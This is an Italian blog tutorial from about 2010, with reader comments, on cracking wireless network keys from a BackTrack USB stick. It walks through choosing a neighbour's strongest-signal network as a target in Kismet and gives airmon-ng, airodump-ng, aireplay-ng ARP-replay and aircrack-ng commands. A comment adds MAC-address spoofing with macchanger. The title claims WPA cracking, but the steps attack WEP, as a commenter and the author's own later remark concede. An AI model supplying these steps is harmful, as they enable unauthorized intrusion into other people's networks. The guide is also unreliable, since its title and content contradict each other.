L'iscrizione al concorso termina fra:
-
Craccare reti wi-fi wireless WPA con windows
Articolo letto 4360 volte dal 01 3rd, 2010 | Condividi
Nella mia precedente guida al cracking delle reti wpa, un utente Cocod73 ha chiesto se era possibile trattare in maniera piu avanzata tale argomento dato che interessa a molte persone.
Ebbene ora per la felicità di tutti eccovi una guida completa ed avanza al cracking delle reti wi-fi wireless con particolare riferimento alle reti WPA che corrispondo al 90% circa delle reti totali.
Come prima cosa per gli utenti windows è necessario installare backtrack 3 un sistema operativo dedicato appositamente al testing di intrusioni, e lo andremo ad installare su una chiavetta usb di almeno 1GB.
Iniziamo con lo scaricare l’ltima verisone di Backtrack Description: USB Version (Extended), dal sito ufficiale, estraiamo il file iso con l’ausilio di win rar e vedremo due cartelle, boot e bt3 che andremo a copiare nella chiavetta.
Clicchiamo ora su start e nella casella cerca di windows digitiamo CMD, aprendo cosi una schermata nera, che è appunto il prorompt dei comandi di windows.
Da risorse del computer vediamo quale lettera è stata associata alla nostra penna, ad esempio E oppure F, e digitiamo nel prorompt dei comandi:
cd F:\boot ( dove F e la lettera associata alla penna ).
Continuiamo digitando bootinst.bat seguiamo le istruzioni del programma ed avremo cosi installato backtrack3 sulla penna usb.
Il primo passo ora da fare per craccare una chiave WPA è quello di individuare il nostro bersaglio piu debole, ossia la rete he puo essere craccata con maggiore facilità.
Per fare cio Avviamo Kismet:
K–>backtrack–>Radio Network Analysis–>80211–>Analyser–>Kismet
ed ordiniamo le reti trovate premendo in sequenza prima la lettra S e poi la lettera Q, selezionando la prima rete che troviamo, ossia quella col segnale piu forte, e quindi la migliore.
Segnamoci la serie di dati che ci vengono restituiti, facendo particolare importanza a SSID, BSSID, Channel, Encrypt, successivamente usciamo premendo prima P e poi Q.
In questo modo abbiamo individuato il bersaglio, mentre il prossimo passo da fare è impostare la scheda di rete del pc in Monitor Mode.
Per fare cio scriviamo sempre nel terminale:
airmon-ng
airmon-ng stop eth0 ed infine
airmon-ng start eth0 11
In questo modo abbiamo abilitato la modalità monitor, dove 11 è il canale utilizzato dall’access point bersaglio che abbiamo precedentemente annotato, dunque 11 puo variare.
Eseguiamo: airodump-ng -c 11 -bssid 00:80:5A:47 –ivs -w wep eth0 chiaramente dobbiamo sostituire con i valori appropriati che abbiamo sul nostro pc/access point;
11: numero di canale
00:80:5A:47: BSSID dell’access point
–ivs: catturiamo solo i pacchetti iv
wep: suffisso del file
A questo punto dobbiamo aprire un nuovo terminale, senza pero chiudere questo che abbiamo aperto ora, e scrivere all’interno di questo:
aireplay-ng -3 -b 00:80:5A:47 -h 00:13:Ce:C6 eth0
-3: indica di usare l’attacco arp request replay
00:80:5A:47: MAC address dell’access point
00:13:Ce:C6: MAC del client associato alla rete
IMPORTANTE: per conoscere il mac basta usare kismet, premere S e Q, selezionare il bersaglio e premere C.
Fatto cio, apriamo una nuova shell e scriviamo:
aircrack-ng -a 1 -b 00:80:5A:47 -n64 wep-01.ivs
con i valori appropriati:
1: protocollo WEP
-n64: ricerca chiavi a 64 bit (se dopo migliaia di iv la chiave non viene trovata rifacciamo senza -64).
UPDATE 10/02/2010 Nuova guida solo per Windows senza utilizzo di Gnu/Linux Backtrack
20 commenti »
RSS feed dei commenti a questo articolo. TrackBack URL
Lascia un commento
ciao,
articolo interessante, pensi di fare anche una guida un po’ più dettagliata? Sarebbe magnifico vedere in video il funzionamento.
Ciao e buon anno
Cocod
si potrei anche optare per una guida piu dettagliata, casomai in questi giorni, dato che ora mi trovo al corto di tempo.
guida completata in modo piu che dettagliato e con ausilio di tecniche avanzate di intrusione.
ciao,
volevo farti i complimenti per il sito in generale! davvero molto bello.
Avrei una cosa da chiederti.. ma come cavolo si fa ad installare aircrack?? ti prego di essere molto preciso perchè queste tipologie di programmi sono nuovi. ps.il mio sistema operativo è windows xp
logicamente volevo dire che quella tipologia di programma è nuova per me, non in generale:)
come faccio a fare partire Kismet?
@rikystuu89 dipende dalla versione che prendi, se si tratta diu file binari, file windows, pacchetti debiannizzati etc… devi essere piu preciso…
Per maggiori info su kismet, puoi andare qua ( wi-fiplanet.com/tutorials/article.php/3595531 ), la guida è inglese, appena posso la traduco.
Puoi avviare kismet comunque dal menu in basso, nn ricordo di preciso dove si trova dato che ora sto col mac e non con backtrack.
la mia versione è aircrack-ng-1.0-win. per quanto riguarda backtrack ho scaricato e installato la terza versione (USB) sulla chiavetta ma non riesco a far partire il programma.. come devo fare?
dovresti essere piu preciso.. che programma non ti parte? che procedura svolgi? che os usi?
possiamo sentirci in privato o su una chat? hai msn, facebook o skype? il mio indirizzo di msn è la mail che ho inserito.
scusa kinglion ma il file che mi fa scaricare è iso come si può estrarre da da un file iso con winrar? non è che cè un errore? please rispondi
no assolutamente nessun errore, con winrar puoi estrarre contenuti iso
allora sono sfortunato perchè quando cerco di estrarre il file dalla iso con winrar mi dice nessun archivio individuato XD…eppure ho scaricato il file giusto..sai perchè fa così?
Ciao Kinglion!
Intanto complimenti per il sito e in particolare per questo articolo che mi ha interessato.
Volevo chiederti: ho scaricato l’ultima versione di Backtrack, la “4 Pre Release” e all’interno del file .iso c’è la cartella boot ma non quella bt3, ma un’altra cartella chiamata casper, più un file .txt e uno .catalog.
devo copiare tutto nella chiave USB?
Grazie in anticipo!
ciao criss a dire il vero nn ho avuto ancora modo di provare il 4…
tutto perfetto nella guida , un solo intoppo sta nelle funzioni kismet per trovare il mac attraverso il tasto C ,non rilacia nessuna informazione .Da premettere che ho la versione back track 3 su disco ,credo che sia la stessa della pennina .
Complimenti per gli articoli
potete pure spoofare il vostro mac address…
Con il comando macchanger –mac=00:11:22:33:44:55 eth0 <- Vostra device di rete…
Ps:laGuidaè per il cracking di chiavi wep non wpa
Ciao KingLion, complimenti per il sito.
Volevo avvisarti che il range per avere danni permanenti all’udito e al timpano è tra i 150 e i 200 dB, quindi attento a non comprare il nuovo amplificatore!!!
Ecco l’articolo:
http://www.straightdope.com/columns/read/2298/can-a-noise-be-loud-enough-to-kill-you
Scusa me che intendi con
“1: protocollo WEP”?
Quote:
“Fatto cio, apriamo una nuova shell e scriviamo:
aircrack-ng -a 1 -b 00:80:5A:47 -n64 wep-01.ivs
con i valori appropriati:
1: protocollo WEP
-n64: ricerca chiavi a 64 bit (se dopo migliaia di iv la chiave non viene trovata rifacciamo senza -64).”
[...] di WPE perche e praticamente improbabile craccarla. Per approfondimenti qua ho scritto una guida Craccare reti wi-fi wireless WPA con windows | Informatica e tecnologia ( il titolo e sbagliato xd sono wpe nn wpa ma nn correggo xke il link e indicizzatoi bene da win ) [...]